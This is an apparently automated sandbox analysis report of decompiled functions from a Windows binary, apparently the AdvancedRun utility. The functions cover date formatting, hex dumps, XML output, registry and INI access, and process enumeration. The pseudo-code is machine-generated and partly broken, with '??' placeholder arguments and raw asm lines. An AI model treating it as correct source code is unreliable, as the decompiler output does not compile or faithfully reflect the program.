C-Code - Quality: 100%

			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}

0x00404ed0
0x00404edf
0x00404ef6
0x00000000
0x00404f00
0x00404f1c
0x00404f31
0x00404f41
0x00404f4e
0x00404f5d
0x00404f66
0x00404f69
0x00404f69
0x00404f71
0x00404f77
0x00404f7d

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
wcscpy.MSVCRT ref: 00404F41
wcscat.MSVCRT ref: 00404F4E
wcscat.MSVCRT ref: 00404F5D
wcscpy.MSVCRT ref: 00404F71

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}

0x00404fe0
0x00404fe9
0x00405000
0x00405005
0x00405009
0x0040500c
0x0040500e
0x00405015
0x00405016
0x00405021
0x00405026
0x00405027
0x0040502c
0x00405031
0x00405039
0x0040503f
0x00405044
0x00405048
0x0040504e
0x00405056
0x0040505c
0x0040504e
0x00405065
0x0040506a
0x00405072
0x00405079

APIs

memset.MSVCRT ref: 00405000
_snwprintf.MSVCRT ref: 00405027
wcscat.MSVCRT ref: 00405039
wcscat.MSVCRT ref: 00405056
wcscat.MSVCRT ref: 00405065

Strings

%2.2X, xrefs: 00405016

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC

Uniqueness

Uniqueness Score: -1.00%

Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}

0x00407d9c
0x00407d9e
0x00407da5
0x00407db3
0x00407dba
0x00407dc5
0x00407dc7
0x00407dd0
0x00407dc9
0x00407dc9
0x00407dc9
0x00407dd8
0x00407de1
0x00407de5
0x00407deb
0x00407df2
0x00407df3
0x00407dfe
0x00407e03
0x00407e04
0x00407e21

APIs

memset.MSVCRT ref: 00407DA5
memset.MSVCRT ref: 00407DBA
_snwprintf.MSVCRT ref: 00407E04

Strings

<?xml version="1.0" ?>, xrefs: 00407DC9
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
<%s>, xrefs: 00407DF3

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED

Uniqueness

Uniqueness Score: -1.00%

Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}

0x00403b56
0x00403b5d
0x00403b6f
0x00403b76
0x00403b82
0x00403b8d
0x00403b8e
0x00403b99
0x00403b9e
0x00403b9f
0x00403ba7
0x00403bb9
0x00403bce
0x00403be5
0x00403bef
0x00403bf8
0x00403c00

APIs

memset.MSVCRT ref: 00403B5D
memset.MSVCRT ref: 00403B76

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

exefile, xrefs: 00403BAD
Advanced Run, xrefs: 00403BBE
"%s" /EXEFilename "%%1", xrefs: 00403B8E

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
API String ID: 1832587304-479876776
Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}

0x0040afd3
0x0040afe2
0x0040aff3
0x0040b002
0x0040b023
0x00000000
0x0040b047
0x0040b02e
0x0040b034
0x0040b03c
0x00000000

APIs

wcscpy.MSVCRT ref: 0040AFD3
wcscat.MSVCRT ref: 0040AFE2
wcscat.MSVCRT ref: 0040AFF3
wcscat.MSVCRT ref: 0040B002
VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE

Strings

\StringFileInfo\, xrefs: 0040AFCD

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00405EB2
wcscpy.MSVCRT ref: 00405ED5

Strings

general, xrefs: 00405ECB
menu_%d, xrefs: 00405E96
strings, xrefs: 00405EC0
dialog_%d, xrefs: 00405EA6

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF

Uniqueness

Uniqueness Score: -1.00%

Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0) {
					L12:
					__eflags =  *0x4101b8 - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E00409510(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x4101bc - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x40f840() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
										E0040920A( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x40f844() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E00409510(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}

0x004092f3
0x004092fb
0x00409303
0x00409305
0x00409310
0x00409433
0x00409433
0x00409439
0x0040943f
0x00409445
0x0040944b
0x0040944e
0x00409452
0x00409466
0x0040946e
0x00409475
0x004094f7
0x004094f7
0x004094f9
0x00000000
0x00000000
0x00409488
0x00409494
0x004094a5
0x004094a9
0x004094b5
0x004094c3
0x004094c6
0x004094d5
0x004094dc
0x004094e1
0x004094e3
0x004094f1
0x00000000
0x004094f1
0x00000000
0x004094e3
0x00000000
0x004094f7
0x00409452
0x00409316
0x00409316
0x0040931c
0x00000000
0x00409322
0x0040932b
0x00409333
0x00409337
0x00409341
0x00409342
0x0040934e
0x0040934f
0x00409358
0x0040935e
0x0040935e
0x00409363
0x0040936b
0x0040936d
0x00409377
0x00409385
0x0040938d
0x0040939d
0x004093a5
0x004093ac
0x004093b4
0x004093c5
0x004093c9
0x004093da
0x004093df
0x004093e5
0x004093e6
0x004093ea
0x004093f6
0x004093fc
0x00409407
0x00409407
0x0040941d
0x00000000
0x00000000
0x00409423
0x00409428
0x00409375
0x00409375
0x00000000
0x00000000
0x0040942e
0x00000000
0x00409428
0x00409377
0x0040936d
0x004094fb
0x004094ff
0x004094ff
0x00409337
0x0040931c
0x0040950f

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
memset.MSVCRT ref: 0040938D
memset.MSVCRT ref: 0040939D

Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233

memset.MSVCRT ref: 00409488
wcscpy.MSVCRT ref: 004094A9
CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}

0x00402ed7
0x00402eee
0x00402ef8
0x00402f00
0x00402f01
0x00402f05
0x00402f0a
0x00402f1a
0x00402f30

APIs

GetClientRect.USER32 ref: 00402ED7
GetSystemMetrics.USER32 ref: 00402EE5
GetSystemMetrics.USER32 ref: 00402EF1
BeginPaint.USER32(?,?), ref: 00402F0B
DrawFrameControl.USER32 ref: 00402F1A
EndPaint.USER32(?,?), ref: 00402F27

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90

Uniqueness

Uniqueness Score: -1.00%

Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}

0x004079a4
0x004079b8
0x004079bd
0x004079c2
0x004079c5
0x004079c5
0x004079db
0x004079f7
0x00407a06
0x00407a0c
0x00407a11
0x00407a13
0x00407a14
0x00407a17
0x00407a18
0x00407a1d
0x00407a22
0x00407a25
0x00407a2a
0x00407a35
0x00407a3a
0x00407a3b
0x00407a40
0x00407a52

APIs

memset.MSVCRT ref: 004079DB

Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407A25

Strings

</item>, xrefs: 00407A41
<item>, xrefs: 004079AE
<%s>%s</%s>, xrefs: 00407A18

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}

0x00404683
0x00404692
0x00404699
0x0040469b
0x004046af
0x004046ba
0x004046bc
0x004046c7
0x004046cc
0x004046cd
0x004046ee
0x004046f3
0x004046fa
0x004046fa
0x004046ee
0x00404705

APIs

memset.MSVCRT ref: 004046AF
_snwprintf.MSVCRT ref: 004046CD
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

%s\shell\%s, xrefs: 004046BC

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen_snwprintfmemset
String ID: %s\shell\%s
API String ID: 1458959524-3196117466
Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}

0x00409d5f
0x00409d67
0x00409d70
0x00409ddb
0x00409d72
0x00409d74
0x00409db2
0x00409d84
0x00409d84
0x00409d8c
0x00409d8d
0x00409d98
0x00409d9d
0x00409d9e
0x00409da6
0x00409daf
0x00409daf
0x00409dc3
0x00409dc3

APIs

wcschr.MSVCRT ref: 00409D79
_snwprintf.MSVCRT ref: 00409D9E
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
GetPrivateProfileStringW.KERNEL32 ref: 00409DD4

Strings

